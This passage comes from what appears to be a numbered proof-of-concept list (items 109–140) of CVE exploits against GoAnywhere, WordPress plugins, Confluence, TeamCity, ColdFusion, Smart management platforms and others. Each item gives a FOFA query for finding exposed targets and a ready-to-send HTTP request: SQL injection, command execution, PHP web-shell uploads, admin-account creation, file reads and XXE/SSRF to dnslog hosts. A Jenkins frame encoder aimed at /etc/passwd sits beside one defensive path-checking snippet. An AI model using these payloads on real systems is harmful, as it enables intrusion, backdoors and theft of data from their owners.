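The upload body above is shown in Python `b'...'` escape notation; what actually goes on the wire is a short binary frame stream. The following is an added example (not from the original post and not Jenkins code) that encodes and decodes that stream, so the request can be rebuilt for other paths and the Content-Length checked. Frame layout, as implemented in hudson.cli.PlainCLIProtocol: 4-byte big-endian length, one opcode byte, then `length` bytes of data; ARG(0), LOCALE(1) and ENCODING(2) carry a 2-byte big-endian length plus UTF-8 text (Java writeUTF), START(3) carries nothing. Two points this makes visible: the raw body for the `help @/etc/passwd` request is 57 bytes, which is the value Content-Length must carry when the bytes are sent raw rather than as the escaped text; and the `@/etc/passwd` argument is the bug itself, since args4j expands an argument beginning with `@` into the lines of that file before the command parser sees them.

```python
"""Added example: encode/decode the Jenkins CLI-over-HTTP frame stream (item 109)."""
import struct

# Opcode values follow the order of hudson.cli.PlainCLIProtocol.Op
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3
OP_NAMES = {OP_ARG: "ARG", OP_LOCALE: "LOCALE", OP_ENCODING: "ENCODING", OP_START: "START"}


def _frame(op, data=b""):
    # The length prefix counts the data only, not the opcode byte.
    return struct.pack(">I", len(data)) + bytes([op]) + data


def _utf(text):
    # Java DataOutput.writeUTF: 2-byte big-endian length, then the bytes.
    raw = text.encode("utf-8")
    return struct.pack(">H", len(raw)) + raw


def build_upload_body(args, encoding="GBK", locale="en_US"):
    """Body of the `Side: upload` POST: one ARG frame per argument, then ENCODING, LOCALE, START."""
    body = b"".join(_frame(OP_ARG, _utf(a)) for a in args)
    body += _frame(OP_ENCODING, _utf(encoding))
    body += _frame(OP_LOCALE, _utf(locale))
    body += _frame(OP_START)
    return body


def parse_frames(body):
    """Decode a frame stream into (opcode name, text or None) tuples; reject truncated input."""
    frames, pos = [], 0
    while pos < len(body):
        if len(body) - pos < 5:
            raise ValueError("truncated frame header at offset %d" % pos)
        (length,) = struct.unpack(">I", body[pos:pos + 4])
        op = body[pos + 4]
        data = body[pos + 5:pos + 5 + length]
        if len(data) != length:
            raise ValueError("truncated frame body at offset %d" % pos)
        pos += 5 + length
        if op in (OP_ARG, OP_LOCALE, OP_ENCODING):
            (slen,) = struct.unpack(">H", data[:2])
            frames.append((OP_NAMES[op], data[2:2 + slen].decode("utf-8")))
        else:
            frames.append((OP_NAMES.get(op, "OP%d" % op), None))
    return frames


def file_read_args(path):
    """Arguments used in item 109. args4j expands an argument that starts with '@'
    into the lines of that file, so the file's contents become CLI arguments and
    leak back in the error output shown above."""
    return ["help", "@" + path]


if __name__ == "__main__":
    body = build_upload_body(file_read_args("/etc/passwd"))
    print(len(body), "bytes:", body.hex())
    for name, value in parse_frames(body):
        print(name, value)
```

The upload and download requests must carry the same Session value; the download side blocks until the upload side has delivered the START frame, which is why the two requests are issued together.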

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value from a plain page load.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php.

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

Uploaded file path: /upload/2.php

( O3 `- D. u' ]4 Z. f3 G' g% F. [7 F, C+ a' Y
121. Beijing Byzoro (百卓) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA: title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Byzoro (百卓) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA: title="Smart管理平台"
The sql parameter is a base64-encoded SQL statement that the endpoint runs directly: sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection (text-inline.vm) remote code execution
CVE-2023-22527
FOFA: app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3" (the body string is the Chinese-locale footer "Powered by Atlassian Confluence 8.5.3")
The OGNL expression in the x parameter runs the command and writes its output into the X-Cmd-Response response header, so check the response headers rather than the body.
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA: body="/Content/Theme/Standard/webSite/login.css"
The admintool endpoint writes fileContent to filePath under /Scripts/ with no authentication and no extension check.
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA: icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; from there system commands can be executed.

126. aiohttp static route path traversal
CVE-2024-23334
FOFA: title=="ComfyUI"
Send the request raw (for example curl --path-as-is, or a raw socket); browsers and most HTTP client libraries collapse the ../ segments before the request leaves the client, so a normal client will never trigger it.
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

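The traversal above works because the static handler joins the request path onto the static root without checking that the result stays inside it. The following is an added illustration, not aiohttp's own code: the naive join beside a hardened resolver that percent-decodes, resolves symlinks and then requires the candidate to share the root as its common path. The static root /srv/app/static is a constructed value and does not need to exist.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Constructed static root for the demonstration; it need not exist on disk,
# os.path.realpath normalises non-existent paths lexically.
STATIC_ROOT = "/srv/app/static"


def naive_resolve(root: str, rest: str) -> str:
    """Vulnerable pattern: join the remainder of the URL onto the root and normalise.

    `rest` is the part of the request path after the /static/ route prefix. Nothing
    checks that the result is still under `root`, so '../' segments walk out of it.
    """
    return os.path.normpath(os.path.join(root, unquote(rest)))


def safe_resolve(root: str, rest: str) -> Optional[str]:
    """Hardened form: resolve the candidate fully, then require it to stay inside the root.

    Returns the absolute path to serve, or None when the request escapes the root.
    Percent-decoding happens before the check so that %2e%2e is treated as '..';
    realpath follows symlinks, which also covers a symlink that points outside the root.
    """
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, unquote(rest)))
    # commonpath rather than startswith: /srv/app/static-private would pass a prefix test.
    try:
        inside = os.path.commonpath([root_real, candidate]) == root_real
    except ValueError:  # different drives on Windows
        inside = False
    return candidate if inside else None


def classify(root: str, request_path: str, prefix: str = "/static/") -> dict:
    """Resolve one raw request target (as a raw-socket client sends it) both ways."""
    if not request_path.startswith(prefix):
        raise ValueError("not a static route request")
    rest = request_path[len(prefix):]
    return {"naive": naive_resolve(root, rest), "safe": safe_resolve(root, rest)}


if __name__ == "__main__":
    for target in ("/static/css/app.css",
                   "/static/../../../../../etc/passwd",
                   "/static/%2e%2e/%2e%2e/etc/passwd"):
        print(target, classify(STATIC_ROOT, target))
```

For the PoC target the naive join yields /etc/passwd while the hardened resolver returns None; the percent-encoded variant is rejected for the same reason, which is why decoding must happen before, not after, the containment check.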
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA: body="Services/Identification/login.ashx"
The Params part is parsed as XML with external entities enabled; a DNS callback to the entity host confirms the bug without reading a file.
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 update 17 and earlier, 2021 update 7 and earlier, 2023 update 1 and earlier
FOFA: app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA: app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid from the unauthenticated heartbeat endpoint
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd; the uuid header carries the value returned by step 1 (the uuid below is the PoC author's example)
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA: icon_hash="-334624619"
The only credential in the request is the forged cookie pair user_name/user_id; the avatar upload keeps the .php extension.
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <= 20231017 SQL injection
FOFA: icon_hash="-2087517259"
Admin console: http://localhost:8080/tmall/admin
Time-based injection through the orderBy parameter (the response is delayed by 3 seconds when the database name is 11 characters long):
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA: body="Log in to TeamCity"
A request to a non-existent path that ends in ;.jsp and carries a jsp query parameter is dispatched to the REST endpoint named in that parameter without authentication, so the request below creates a new system administrator.
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199 (path traversal to authenticated admin pages; the same release fixes it)
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

Exploit script: CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5云商城) file.php file upload
FOFA: body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA: app="网康科技-NS-ASG安全网关"
Error-based injection through the IPAddr field of the addmacbind message; the MySQL version is returned in the updatexml error text.
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA: app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat /api/cors SSRF
CVE-2023-49785
FOFA: title="NextChat"
The /api/cors/ proxy fetches whatever URL follows it; a DNS callback hostname confirms the server-side request.
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
All five Kirisun entries (137 to 141) are time-based blind injections: a response delayed by about 5 seconds confirms the bug.
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
